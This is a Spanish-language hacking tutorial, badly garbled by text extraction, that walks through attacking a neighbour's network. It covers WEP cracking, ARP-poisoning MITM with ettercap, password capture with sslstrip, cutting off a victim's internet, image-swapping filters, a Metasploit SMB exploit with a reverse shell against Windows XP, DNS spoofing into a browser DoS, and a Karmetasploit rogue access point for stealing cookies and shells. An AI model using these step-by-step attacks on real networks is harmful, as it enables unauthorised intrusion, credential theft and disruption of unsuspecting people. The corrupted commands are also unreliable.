JUGANDO EN LA RED
[email protected] Esta obra se encuentra bajo la licencia Creative Commons 3.0 – España:
1
Introducci ó n ón Secci ó ón Wireless Secci ó ón Sniffers Secci ó ón Metasploit Secci ó ón DNS-Spoofing Karmetasploit
2
Introducci ó n ón Secci ó ón Wireless Secci ó ón Sniffers Secci ó ón Metasploit Secci ó ón DNS-Spoofing Karmetasploit
2
PASANDO UNA TARDE CON EMOCIÓN Propongamos un escenario: Es domingo por la tarde, la televisión es una una basura (para variar) y estamos aburridos, aburridos, así que decidimos buscar una red wii en nuestro vecindario y aventurarnos en lo desconocido, aquí empie!a nuestra odisea en la que veremos algunas cosas interesantes que podremos "acer para #entretenernos$% Para este tutorial traba&aremos sobre 'actrac *+2 que *+2 que "a salido "ace poco y contiene prcticamente todas las aplicaciones que utili!aremos, adems en el caso de la auditoria de redes wii, lleva los drivers para que la mayoría de tar&etas pueda entrar en modo monitor e inyectar% 'actrac se nos nos presenta en ormato .iso para que lo utilicemos desde un cd en modo live cd o desde un -.', aunque tambi/n e0iste la posibilidad de instalarlo en el disco duro o descargarnos una maquina virtual ya preparada y correrla sobre Player % .i para la auditoria de redes wii se desea utili!ar una tar&eta que no sea -.' debemos utili!ar cualquier alternativa que no sea la virtuali!ación% .i este es vuestro caso yo recomiendo crear un -.' live con 'actrac y un buen programa para ello es -netbooin -netbooin%% 3"ora ya es a gusto de cada uno escoger el que mas le interese para traba&ar, aunque aunque tambi/n "ay alternativas algo mas traba&osas que no "e mostrado como crear un -.' persistente con 'actrac o utili!ar irtual'o0 irtual'o0 como como "e "ec"o yo, e instalar 'actrac en una de sus maquinas virtuales, ya que me daba pere!a registrarme en la pagina de 4are para obtener el Player que aunque es gratuito requiere de registro para descargarlo y despu/s te mandan publicidad% +reo que tambi/n "ay orma de convertir las maquinas virtuales de 4are 4are al ormato reconocido por irtual'o0, irtual'o0, aquí ya es a elección de cada uno escoger la opción que ms se amolde a sus preerencias% Por 5ltimo recordar que es a gusto y #riesgo$ de cada uno reali!ar las tareas que aquí se e0ponen, ya que si alguien abre un agu&ero negro en el proceso no me responsabili!o del caos producido 6)% 'ueno esto es todo, todo, a disrutar y aprender% aprender%
.aludos,
Aetsu
7
– Sección Wireless – 1a parte 8o primero que nos interesar "acer es obtener acceso a la red wii ob&etivo, una ve! estemos dentro ya podremos empe!ar a &ugar% Para ello utili!arnos la amosa suite aircrackn! % 9 Para esta sección utili!aremos: acc"anger: Para cambiar la 3+ de nuestra tar&eta wii% 8a .uite 3ircracng: Para el tema de la auditoria wii% • •
8o e0plicar/ bastante metódico y al inal de la sección a;adir/ enlaces a tutoriales complementarios para quien quiera adentrarse ms en el tema o quien no tenga muy claro lo e0plicado aquí% 1% Primero detenemos nuestra intera! (la que usaremos para la auditoria, en mi caso wlan1) y la ponemos en modo monitor% iconig "lan1 down airmonng start "lan1 +on esto ya tendremos nuestra intera! en modo monitor y nuestra intera! pasar a llamarse #$n%:
3"ora cambiaremos la 3+ de nuestra intera! en modo monitor con:
i&c$n&i! mon< '$"n #acc(an!er # <<:11:22:77::== mon< i&c$n&i! mon< up +on esto ya tendremos la 3+ de nuestra tar&eta cambiada y podemos seguir con la auditoria% 2% 3 continuación mediante air$'u#pn! buscaremos una red con seguridad complicarnos demasiado la vida): airodumpng #$n%
Escogeremos 483>?7 y con sus datos ya podremos proceder a reali!ar un ms concreto: air$'u#pn! " captura )ssi' aa:bb:cc:dd:ee: c@ mon<
WEP (para no
air$'u#pn!
Aonde: • • • •
captura es el arc"ivo donde se almacenarn los datos capturados% aa*))*cc*''*ee*&& es el '..BA del punto de acceso% + es el canal del punto de acceso% #$n% es nuestra intera! en modo monitor%
7% -na ve! ya tenemos una terminal capturando los datos vamos a intentar acelerar un poco el proceso, recordemos que queremos que la columna ,Data del air$'u#pn! llegue a los C<<<< paquetes como mínimo (con menos paquetes puede bastar, la cuestión es ir probando), para ello utili!aremos el ataque 1-./ Este ataque consiste en dos pasos, asociarnos al punto de acceso e inyectar tráfico en este% En el paso de asociación (desde una terminal nueva) utili!aremos airepla0n!: airepla0n! 1 1< e 483>?7 a aa:bb:cc:dd:ee: ( <<:11:22:77::== mon<
Aonde: • • • • •
1% es tiempo que pasa entre cada prueba de asociación% WAN23. es el E..BA del punto de acceso% aa*))*cc*''*ee*&& es el '..BA del punto de acceso% %%*11*44*..*33*55 es la 3+ de nuestra tar&eta wii% #$n% es nuestra intera! en modo monitor%
El segundo paso consiste en inyectar traico, para ello abrimos otra terminal y: airepla0n! . ) aa:bb:cc:dd:ee: ( <<:11:22:77::== mon<
Aonde: • • •
aa*))*cc*''*ee*&& es el '..BA del punto de acceso% %%*11*44*..*33*55 es la mac de nuestra tar&eta wii% #$n% es nuestra intera! en modo monitor% =
% +on esto solo nos queda esperar a tener suicientes ,Data, para ello desde otra terminal e&ecutamos el aircrackn! para que vaya probando con los ,Data que vamos obteniendo "asta que obtengamos la contrase;a, para ello: aircracng captura6/cap
Aonde: •
captura6/cap es el arc"ivo que contiene los paquetes capturados con el airodumpng%
+on esto ya tendremos la contrase;a del punto de acceso y podremos acceder a este con lo que ya "emos acabado esta sección%
7 In&$r#aci$n interesante s$)re el te#a* • • •
Dacing 4ireless con 3ircracng (cirado 4EP odos los ataques)% 3saltando redes 4P3 con aircracng% 3saltando redes 4BFB (4EPG4P3) en pd para descargar%
C
4a parte Ha "emos observado como sería el proceso para acceder a una red wii con cirado 4EP, pero, lo que a"ora veremos, ser como "acerlo de orma ms rpida o automtica% Para ello nos valdremos de dos "erramientas, la primera es "lan'ecr0pter que nos permite obtener con apenas 5 ,Data las contrase;as (por deecto) de las redes WAN288% 8a segunda es 9ri# Wepa, que nos permite "acer lo que "emos visto en la primera parte (adems de otras muc"as cosas) de orma automtica con una I-B%
9 Wlan'ecr0pter: +omo "e comentado antes "lan'ecr0pter nos permite obtener los password por deecto de las redes cuyo E..BA sea 483>?JJ con una peque;a cantidad de KAata acortndonos enormemente el tiempo necesario para obtener la contrase;a, aunque no viene por deecto con 'actrac por tanto si queremos obtener la ultima versión tenemos que descargarlo: "ttp:GGwww%wiiway%orgGarc"ivosGwlandecrypter1%7%1%tar%g! -na ve! descargado ya podremos utili!arlo, no "ace alta instalarlo ya que dentro ya viene el e&ecutable compilado y listo para utili!ar% Para utili!arlo partiremos del punt$ 4 'e la pri#era parte donde ya tenemos al airodumpng capturando paquetes:
+omo vemos ya tenemos 11 KAata, cantidad insuiciente para obtener la contrase;a (necesitaríamos ms de 2<%<<< como mínimo), pero con "lan'ecr0pter podemos crear un diccionario con todos los password por deecto para ese E..BA, para ello:
/:"lan'ecr0pter aa:bb:cc:dd:ee: 483>?F@ diccionario donde: • • •
aa*))*cc*''*ee*&& : Es el '..BA del punto de acceso% WAN2;+: Es el E..BA del punto de acceso% 'icci$nari$: El nombre del diccionario que crearemos con las posibles claves%
L
Por 5ltimo solo nos queda lan!ar el aircrackn! con el diccionario que acabamos de crear:
aircrackn! " diccionario captura%cap donde: • •
'icci$nari$: Es el diccionario creado antes con el "lan'ecr0pter% captura/cap: Es el arc"ivo de captura generado con el air$'u#pn!%
7 9ri# Wepa* Este programa se encuentra en 'actrac , podemos encontrarlo en
Menu < =acktrack < Ra'i$
Net"$rk Analisis < >%411 < Crackin! < 9ri#Wepa/ 9ri# Wepa nos orece una intera! desde la que podemos reali!ar los dierentes ataques a cirados 4EP o 4P3 de una orma cil y cómoda% Para esta prueba lo utili!aremos con la inalidad de obtener la contrase;a de una red 4EP con E..BA 483>?F@% +uando tengamos el programa corriendo se nos preguntar que intera! queremos poner en modo monitor, la seleccionamos y el mismo se encargar de ello%
M
3 continuación en Inter&ace seleccionaremos nuestra intera! en modo monitor y pulsaremos el boton Start scan, antes podemos seleccionar sobre que canal traba&ar Grim Wepa o seleccionarlos todos (All C(annels)% 3l "acer esto veremos como tambi/n "ay una terminal con airodum-ng uncionando% -na ve! encontremos la red que queremos auditar pulsamos en St$p scannin! %
3"ora una ve! tengamos nuestro ob&etivo, en mi caso 483>?F@ debemos seleccionar el tipo de ataque, para ello abrimos el desplegable de Attack #et($' y lo seleccionaremos ARP-Replay (ataque 1+3 visto en la primera parte), adems podemos probar la inyección con el botón que "ay a su lado Test in?ecti$n/ Ta#)i@n podemos seleccionar la velocidad de inyección en In?ecti$n rate ppsB o seleccionar un cliente asociado con C($$se client/ @
-na ve! este todo listo ( ARP-Replay en Attack #et($') pulsamos en Start Attack y veremos al lado del botón los paquetes capturados vlidos, adems de una ventana con el airodum-ng y el aireplay-ng %
3 partid de 1<%<<< paquetes capturados el programa empe!ar a intentar obtener la contrase;a, si somos impacientes podemos pulsar nosotros el botón de Start Crackin!/ 3l inal cuando obtengamos la contrase;a la veremos en la parte inerior: 1<
11
– SECCION SNI;;ERS – -na ve! obtenida la contrase;a ya tendremos acceso a la red, y por tanto estaremos en AN con todos los equipos conectados al punto de acceso con lo que podremos desde obtener las contrase;as que via&an por la red "asta acceder a su pc o de&ar ordenadores sin acceso a internet% 9 Para esta sección utili!aremos: 'actrac *2: raba&aremos sobre este sistema operativo basado en -buntu M%1< Ettercap gt: -n snier de traico de red% ..8.trip : .nier para contrase;as encriptadas% 4ires"ar : -n programa para el anlisis de redes% • • • •
Esta sección la ocupan los sniers, de los que veremos 7 como son Ettercap, ..8.trip y 4ires"ar % 9 Empe!ando por ettercap vemos que es un programa que nos permite sniar el trico de red y obtener así las contrase;as de otros usuarios de nuestra red que via&en por esta, adems tambi/n permite leer, por e&emplo, las conversaciones de programas de mensa&ería instantnea o ver las pginas que visita nuestra víctima% -na ve! estemos listos para empe!ar arrancamos ettercap , con lo que podemos o bien abrirlo desde el menu de 'actrac( Menu N =acktrack N Priile!e Escalati$n N Sni&&ers N Ettercap 9T ), o bien desde una terminal con:
ettercap 9 y tendremos la intera! grica de ettercap % ambi/n tiene una basada en las librerías ncurses (ettercap -C ) o usarlo en modo te0to( ettercap T)%
3"ora veamos que tenemos que "acer para "acer un ataque B: 1% Pesta;a Sni&& < Uni&ie' Sni&&in!% 2% .eleccionamos la intera! que esta conectada a la red que queremos sniar, despu/s le damos a OAceptarO%
12
7% Pesta;a $st < Scan &$r ($sts % En la parte de aba&o de la pantalla aparecer algo como O X osts added to te osts list...O (J sera un numero correspondiente al numero de maquinas conectadas a la red)% % Pesta;a $st N $st list% 3"ora veremos las BPs de las maquinas conectadas, "ay que tener en cuenta que el router tambi/n aparece%
=% .eleccionamos la BP del ordenador a atacar y pulsamos OA'' t$ Tar!et 1O, despu/s el router OA'' t$ Tar!et 4 O%
17
C% Pesta;a Mit# < ARP P$is$nin!% 3"ora marcamos la pesta;a O Sniff remote connectionsO y pulsamos OAceptarO%
L% Pesta;a Start < Start sni&&in!%
C$n est$ estare#$s sni&&an'$ el tra&ic$ 'e re'/ M% Pesta;a Fie" N C$nnecti$ns% 3quí podemos ver todas las cone0iones y si "acemos doble clic sobre alguna podemos ver los datos que contiene, entre ellos conversaciones de programas de mensa&ería instantnea, usuarios y contrase;as, etc%
1
9 >uestro segundo snier es SSStrip que nos permite obtener contrase;as que via&an ciradas por la red% 'actrac ya lo lleva aunque lleva una versión antigua (la <%C) así que nos descargaremos la ultima versión la <%L% 8a encontraremos en: "ttp:GGwww%t"oug"tcrime%orgGsotwareGsslstripG -na ve! la descarguemos lo e0traemos y dentro encontraremos el script escrito en p0t($n(grandioso lengua&e), por tanto dependeremos de pyton para "acerlo uncionar% 3ntes de continuar tenemos que saber que SSStrip tambi/n se basa en el ataque MITM como ettercap , así que tenemos dos opciones, aprovec"arnos de este 5ltimo (ettercap) para reali!ar un MITM o utili!ar arpsp$$& para crear el nuestro, yo e0plicar/ ambos, es decisión de cada uno escoger el que preiera% •
Met$'$ arpsp$$& : 1% 3 continuación abrimos una s"ell y ponemos:
ec($ G1H < :pr$c:s0s:net:ip3:ip2&$r"ar' 2% 3"ora reali!amos el ataque !"#!$ arpsp$$& i intera!?redQ t ip?victimaQ ip?routerQ a modo de e&emplo arpsp$$& i wlan< t 1@2%1CM%1%1<< 1@2%1CM%1%1 7% 3brimos otra s"ell y cambiamos la redireccion de puertos usando las iptables
ipta)les t nat A PREROUTIN9 p tcp 'estinati$np$rt >% ? REDIRECT t$p$rts 1%%%% •
M@t$'$ ettercap* El m/todo ettercap simplemente consiste en utili!ar el ataque aprendido en la sección anterior% -na ve! tenemos el B traba&ando lan!amos ..8.trip(desde dentro de la carpeta donde lo "emos e0traído): 1%
p0t($n sslstrip/p0 " R nombre?del?arc"ivo?de?captura N a modo de e&emplo
p0t($n sslstrip/p0 " captura% 2% .i queremos ver en tiempo real la inormación obtenida abrimos otra s"ell y:
tail & R nombre?del?arc"ivo?de?captura N a modo de e&emplo
tail & captura 7% Para terminar si posteriormente queremos ver el ic"ero de captura "acemos: cat R nombre?del?arc"ivo?de?captura N o a modo de e&emplo cat captura
1=
9 El tercer snier es Wires(ark uno de los me&ores programas para anali!ar el traico de red con gran cantidad de opciones y iltros% +omo traba&amos con 'actrac ya disponemos de Wires(ark , sino podemos instalarlo bien desde los repositorios o bien descargando el código uente desde su pgina web% -na ve! arrancado el snier veremos algo como esto:
3"ora iremos a la pesta;a Capture N Opti$ns y nos aparecer esta ventana:
En inter&ace seleccionamos la tar&eta con la que queremos sniar el traico% En Capture &ilter podemos ver una serie de iltros para que acilitar la b5squeda de los datos que nos interesen (para el tutorial no pondremos ninguno)% -na ve! estemos listos pulsaremos Start y el programa comen!ara a "acer su unción% 1C
+omo veremos la pantalla se divide en tres partes, las que nos interesan son la superior que contiene todos los paquetes capturados y la inerior que contiene el contenido de cada paquete% En la pantalla superior, en la columna que pone In&$ podemos ver una indicación de lo que contiene el paquete% Por e&emplo si queremos obtener las conversaciones de programas de mensa&ería nos interesar que la parte de Bn&$ empiece por !%G% Para terminar la captura vamos a Capture N St$p% 3l salir del programa o cerrar la sesión nos pedir si queremos guardar la captura, ponemos que no y listo%
7 Otras &unci$nes 'e l$s sni&&er* 3 parte de sniar el traico de red con wires"ar y ettercap podemos "acer otras cosas para entretenernos% En este tutorial veremos el programa tcpJtract que lo utili!aremos &unto con Wires(ark y tambi/n &ugaremos con un par de plu!ins 'el Ettercap %
TCP8TRACT Este programa permite obtener las imgenes que "ubiese entre los paquetes guardados en la captura% amos a verlo mas claro en un e&emplo% Primero, puesto que 'actrac no lo incluye tendremos que instalarlo: apt!et install tpc0tract una ve! instalado: 1 S +reamos una carpeta en cualquier directorio: #k'ir wire c' wire #k'ir arc"ivos 1L
2 S 3rrancamos el Wires(ark y "acemos lo anterior para obtener paquetes, v/ase N Opti$ns, seleccionamos la intera! y le damos a Start% 3"ora iremos a Ioogle y buscaremos imgenes en el:
+omo vemos el
Captura
Wires(ark "a capturado los paquetes:
7 S ;ile N Sae as :
1M
Aespu/s elegimos la carpeta creada anteriormente y le ponemos un nombre, en este caso le pondr/ capturas% S -na ve! ec"o esto vamos a una terminal, nos dirigimos a la carpeta creada antes ( &ire) y ponemos: tcpJtract &ile captura $utput arc"ivos y aparecer esto:
+on esto se generaran en la carpeta arc"ivos todas las imgenes encontradas en #captura
%$.i alla el comando
tcpJtract &ile captura $utput arc"ivos repetirlo "asta que uncione, ya que algunas veces alla% 1@
ETTERCAP ISOATE Ttra cosa que podríamos "acer a nuestra victima sería de&arla sin Bnternet% Para ello nos valdremos del plugin isolate. Para esta parte del tutorial partiremos de lo que "emos visto antes con Ettercap , es decir, partimos desde que "emos conseguido "acer un B y entonces iremos a Plu!ins N Mana!e plu!ins y aparecer:
-na ve! allí "acemos doble clic en isolate y en breve (a veces tarda un poco) de&aremos a nuestra víctima sin Bnternet%
2<
ETTERCAP ;ITRO IMA9ENES 3ntes "emos utili!ado un iltro que nos proporcionaba Ettercap , pero esta ve! nos descargaremos uno y lo #prepararemos$ para que pueda utili!arlo nuestro programa% .obre la utilidad de nuestro plugin cabe decir que cambiara las imgenes del navegador de nuestra víctima por la que nosotros esco&amos% 8o primero sera obtener el plugin: "ttp:GGwww%irongee%comGi%p"pUpageVsecurityGettercapilter , sino quer/is descargarlo aquí est:
################################################################## ########## # # # Jolly Pwned -- ig.filter -- filter source file # # # # By Irongeek. based on code from ALoR & a!A # # Along wit" some "el from $e% and on.dmml # # "tt'((etterca.sourceforge.net(forum(%iewtoic.")t*+, # # # # "is rogram is free software/ you can redistribute it and(or modify # # it under t"e terms of t"e !0 !eneral Public License as ublis"ed by # # t"e 1ree 2oftware 1oundation/ eit"er %ersion + of t"e License3 or # # 4at your otion5 any later %ersion. # # # ############################################################################ if 4i.roto ** 6P && tc.dst ** ,75 8 if 4searc"49AA.data3 :Accet-;ncoding:55 8 relace4:Accet-;ncoding:3 :Accet-Rubbis"<:5/ # note' relacement string is same lengt" as original string msg4:=aed Accet-;ncoding<>n:5/ ? ? if 4i.roto ** 6P && tc.src ** ,75 8 relace4:img src*:3 :img src*>:"tt'((www.irongeek.com(images(ollywn.ng>: :5/ relace4:I@! 2R6*:3 :img src*>:"tt'((www.irongeek.com(images(ollywn.ng>: :5/ msg4:1ilter Ran.>n:5/ ?
8o copiamos y lo guardamos en un arc"ivo con e0tension % filter ' para este e&emplo yo lo llamar/ # f"magenes.filter(. NOTA$ )onde pone ttp$**&&&.irongee.com*images*,ollyp&n.png deemos sustituirlo por la direccin de la imagen que queremos que /ea nuestra /0ctima.
-na ve! tengamos nuestro arc"ivo .filter tenemos que convertirlo a un ormato que Ettercap pueda leer (eJtensi$n /e& ) , para ello: etter&ilter Bmagenes%ilter $ Bmagenes%e +on el arc"ivo en ormato .ef en nuestro poder, ponemos Ettercap con el MITM y cargamos nuestro plugin con Plu!ins N $a' a Plu!in % 3quí seleccionamos nuestro arc"ivo .ef con lo que ya solo quedar desde Plu!ins N Mana!e plu!ins seleccionarlo como con el isolate y molestar a nuestra víctima cambindole las imgenes que aparecen en su navegador por las que nosotros deseemos% 21
– SECCION METASPOIT – Dasta a"ora "emos atacado a nuestras víctimas al a!ar sin saber apenas nada de su sistema, a"ora vamos a adentrarnos un poco ms en esta dirección y veremos los equipos que se encuentran en nuestra red y conoceremos algo de sus sistemas% Para este traba&o utili!aremos nuestro amigo n#ap, aunque primero deberíamos saber cual es nuestra sunet para poder lan!ar n#ap con mas precisión (y con un tiempo de respuesta menor):
i&c$n&i! wlan< K !rep WAirec% Bnet:W donde &lan es la intera! que tenemos conectada a Bnternet% 3quí nos mostrara nuestra ip, para este e&emplo supongamos que es 1@2%1CM%<%17, entonces lan!aremos n#ap de la siguiente orma: n#ap A 1@2%1CM%<%X con lo que obtendremos inormación variada de todos los equipos de nuestra subnet, ya sea la 3+, los puertos abiertos adems de los servicios que corren por estos% eamos que "emos obtenido:
emos que tenemos una maquina en la red con 4indows JP adems de los puertos que tiene abiertos% +omo esto es a modo de demostración de lo que es capa! #etaspl$it "e puesto este JP porque es vulnerable, y aunque es preocupante, a5n "ay gente en sus casas que los tiene como este%
22
9 Empecemos a"ora con
#etaspl$it:
Primero desde una terminal arrancamos #etaspl$it con:
#s&c$ns$le ardar un poco pero nos mostrara una bonita pantalla de presentación y con ello el corriendo:
#etaspl$it
3 continuacion nos aprovec"aremos de una vulnerabilidad en el puerto = ya que como "emos visto en nmap lo tiene abierto 1 Ponemos:
use e0ploitGwindowsGsmbGms
s($" pa0l$a's esto nos mostrara una larga lista de payloads, pero a"ora usaremos el # sell2re/erse2tcp$% 7 S .eleccionamos el payload con:
set PALOAD windowsGs"ell?reverse?tcp
Podemos ver las opciones del payload con:
s($" $pti$ns 27
= .eleccionamos la ip del ob&etivo:
set ROST Rip2o,eti/oN C H la nuestra:
set OST Rip2nuestraN
L Por 5ltimo lan!amos el
eJpl$it: eJpl$it
2
+on todo esto ya tendríamos una consola en el sistema víctima sin que nuestro ob&etivo se diese cuenta%
EN RESUMEN* 1 7 4 7 . 7 3 7 5 7
use e0ploitGwindowsGsmbGms
.i quer/is mas ormación sobre esto aquí ten/is una estupenda guía de introducción a #etaspl$it: YutorialZ +onociendo etasploit Framewor Y+oncluidoZ por Rcart
Metaspl$it orece una ininidad de posibilidades, pero con esto queda claro una muestra de su potencial%
2=
– SECCION DNSSPOO;IN9 – 1a parte – Intr$'ucción En esta ultima sección vamos a ver como "acer que nuestra víctima acceda a las paginas web que nosotros queramos en lugar de acceder a las suyas propias% Para ello utili!aremos a nuestro amigo ettercap con un MITM y su plugin dns2spoof' pero, esta ve!, cambiaremos la intera! I[ por la intera! ncurses desde una terminal% Empe!amos arrancando ettercap con ncurses :
ettercap C
3 continuación vamos a Sni&& N Uni&ie' Sni&&in! y nos pedir escribir la intera! con la que queremos sniar el trico%
Pulsamos nter y despu/s vamos a $st N Scan &$r $st con lo que buscara los ost de nuestra red% -na ve! "aya escaneado la red en $st N $st list:
2C
-na ve! veamos los ost , tendremos que seleccionar los ob&etivos como "acíamos con la intera! grica:
+omo vemos tenemos que poner los ob&etivos (el router y la victima) entre #:ip< : % 3"ora antes de continuar con el dns-spoofing vamos a ver el arc"ivo donde se almacenan las direcciones y a donde son redirigidas% Este arc"ivo es:
:usr:s(are:ettercap:etter/'ns y vamos a ver la parte de su contenido que nos interesa:
En la imagen vemos #icr$s$&t/c$# A 1+>/1>4/1+/5 esto signiica que una ve! el dns-spoofing este uncionando cuando nuestra víctima intente acceder a microsoft.com sera redirigida a 145.156.147.87 que es &&&.linu9.org . Este es el etter/'ns que trae ettercap por deecto, nosotros podemos cambiarlo a nuestro gusto (despu/s e0plicare una utilidad #interesante$ para esto)% 'ueno ya tenemos nuestro etter/'ns conigurado, a"ora tenemos que cargarlo en ettercap , para ello continuamos en donde "abíamos de&ado nuestro sniffer y vamos a Plu!ins N Mana!e 'e Plu!ins, con lo que nos aparecer una ventana como esta:
2L
Dacemos doble clic sobre 'ns2sp$$& y veremos como el Q% de la i!quierda pasa a ser Q1 con lo que el plugin ya esta activado% >os queda el 5ltimo a&uste para el !an "n #e !iddle' vamos a Mit# N Arp P$is$nin! y en la ventana que aparecer ponemos:
Ha solo queda Start N Start Sni&&in!:
Entonces cuando nuestra victima acceda a micro:oft.com :
2M
4a parte – $ 'ierti'$ 3ntes de empe!ar esta parte cabe aclarar que lo reali!ado aquí probablemente se puede "acer de otra orma mas simple y sin tanto traba&o, pero la intención de este tutorial es mostrar lo bsico, es ya tarea de cada uno e0plorar las posibilidades% Para esta parte necesitaremos: 'actrac *+2% -na maquina virtual con -buntu 1<%< o 1<%1< (o un ordenador real da igual)% -na victima inocente con 4indows JP% • • •
9 Fa#$s a plantear el escenari$* < Estamos en la misma red local que nuestra victima que tendr un Win'$"s 8P, y lo que "aremos sera aprovec"arnos de un modulo del #etaspl$it que produce una dos cuando la victima se conecta con "nternet 9plorer a una dirección concreta que nosotros le acilitaremos, cosa que podría ser diícil de conseguir sin ingeniería social, pero que nosotros podemos conseguir sin que nuestro ob&etivo se entere% < Entonces la situación quedara asi: =actrack lan!ar el modulo de #estaspl$it con ob&etivo el Win'$"s 8P, y nos proporcionar una dirección (ttp% Entonces en nuestro servidor web con U)untu "aremos que cuando alguien se conecte a el sea redirigido a la dirección que nos proporcionaba =acktrack provocndole una denegación de servicio% Para esta direccional utili!aremos ettercap - 'ns2sp$$& redirigiendo la pagina de Ioogle a nuestro servidor web, ya que ettercap no puede redireccionar a una dirección comple&a como la que nos proporciona #etaspl$it, de a"í que sea necesario utili!ar nuestro servidor web%
7 E#pea#$s* Para empe!ar prepararemos nuestras maquinas virtuales y la que #ms$ traba&o requiere es la de U)untu% 3sí que vamos a instalar lo necesario: su'$ apt!et install mysqlserver=%1 apac"e2 p"p= p"p=mysql libapac"e2modaut"mysql 3"ora reiniciamos y.ql y 3pac"e con: su'$ GetcGinit%dGapac"e2 restart su'$ service mysql restart 8isto, las paginas web se almacenan en :ar:""", aunque ya iremos despu/s a poner nuestra web% Fuente: +omo instalar 3pac"e\ysql\PDP en -buntu 1<%< 9 quina de =acktrack3 : 1] 9 erminal y e&ecutamos #etaspl$it:
#s&c$ns$le 2] 9 use au0iliaryGdosGwindowsGbrowserGms<@?
7] 9 3"ora ponemos nuestra ip:
set SRFOST Rip victimaN en mi caso:
set SRFOST 1@2%1CM%<%2<1 2@
] 9 8an!amos el modulo:
run
Perecto, ya tenemos la dirección que acilitaremos a nuestra víctima, pero y si ^ no quiere aceptarla, _que "acemosU Para esto tenemos el 'nssp$$&in!, para que se conecte a la web que queramos sin que se de cuenta% 9 quina de U)untu 1%/%3 : Entonces nuestro siguiente paso es ir a la maquina en que tenemos nuestro servidor web, en mi caso la de U)untu y vamos al directorio :ar:"""/ 3lli modiicamos el arc"ivo in'eJ/(t#l y lo de&amos como este: ;tml< ;ead< ;title
?"@BRCR%=B DEF#F#B1?RHttp$**146.175..61$55*DaydG5Ag@tctB< ;*ead< ;ody< spere unos segundos... ;*ody< ;*tml< Aonde URL=http://!".#$.%."%:$%$%/Cay&'$A()t*ct+ es la dirección que nos proporciona 'actrac (cada ve! cambia)% +on esto ya tenemos nuestro servidor web listo y queda el para que redireccione Ioogle a la BP de nuestro servidor%
'ns2sp$$& lan!ado desde =acktrack
7<
9 quina de =acktrack3 : Editamos el :usr:s(are:ettercap:etter/'ns y redirigimos la pgina que queramos a nuestra mquina con U)untu, el ic"ero etter/'ns quedar así:
8o siguiente es usar ettercap como "emos visto en la 1a parte y reali!ar un 'ns2sp$$&in! para que nuestra víctima al conectarse a Ioogle o Faceboo con Internet EJpl$rer #muera $% 9 quina de Win'$"s 8P: +uando nuestro inocente amigI acceda a una de las paginas mencionadas antes vera esto:
y =OOM % 9 quina de =acktrack3 : Esto es lo que veremos cuando alguien acceda a nuestra dirección (bien sea redirigido o de orma directa):
71
+on esto acabamos esta sección, aunque "ay que tener en cuenta como "e dic"o al principio de ella que esto es instructivo, es una orma de "acer las cosas que no tiene porque uncionar bien porque el BE no sea vulnerable o porque el dns?spoo no nos unciona o por $tr$s #$ti$s ari$s , pero, la idea de redireccionar la podremos utili!ar en muc"os otros e0ploits que requieran que la víctima acceda a una pgina concreta modiicada para la ocasión, o para crear clones de pginas webs conocidas con intención de obtener los datos privados de un usuario, aquí nuestra imaginación es la que pone el tope :)%
72
– SECCION ARMETASPOIT – Demos visto lo que podemos "acer si nos adentramos en la red de alguien, pero, y sino nos apetece "acer nada, _que "acemosU 8a respuesta es simple, que vengan nuestras víctimas a nosotros creando un punto de acceso also para que se conecten% Para esto utili!aremos ar#etaspl$it% Esto nos permitir robar las cooies de nuestra victima o si su ordenador es vulnerable a uno de los eJpl$its que cargue #etaspl$it podemos incluso obtener una s"ell en su pc% Primero preparamos el terreno, siempre partiendo de que utili!amos 'actrac rc2, para ello descargamos el script kar#a/rc : "!et "ttp:GGmetasploit%comGusersG"dmGtoolsGarma%rc
-na ve! descargado vamos a modiicar el arc"ivo :etc:'(cp.:'(cp'/c$n& ("aced primero una copia del original si lo deseis) y tiene que quedar así: option domain-name-ser/ers 1...1 default-lease-time 7 ma9-lease-time J6 ddns-update-style none autoritati/e log-facility localJ sunet 1... netmas 688.688.688. K range 1...1 1...68L option routers 1...1 option domain-name-ser/ers 1...1 M
77
Para acabar la puesta a punto de armetasploit podemos editar el ic"ero :$pt:#etaspl$it.:#s&.:'ata:eJpl$its:capture:(ttp:sites/tJt donde estn los lugares de los que #etaspl$it intentar robar las cooies, aquí podemos a;adir nosotros los que queramos%
-na ve! est/ todo listo ponemos nuestra tar&eta en modo monitor, para ello(la intera! es wlan<):
air#$nn! start wlan< y cambiamos la 3+ de nuestro punto de acceso (la intera! en modo monitor es mon<):
i&c$n&i! mon< '$"n #acc(an!er r mon< i&c$n&i! mon< up
+on la intera! lista ya podemos crear nuestro punto de acceso con
air)asen!*
air)asen! P C .% c C e G483>?LF mon< 7
donde WHAF2JC es el nombre que queremos darle a nuestro also punto de acceso y mon es nuestra intera! en modo monitor% El paso anterior quedara una nueva intera! at a la cual (desde otra terminal) le damos una ip y activamos el servidor d"cp:
i&c$n&i! at< up 1<%<%<%1 net#ask 2==%2==%2==%< '(cp'. c& GetcGd"cp7Gd"cpd%con at<
+omo ultimo paso arrancaremos
#etaspl$it con ,arma$ #s&c$ns$le r arma%rc
7=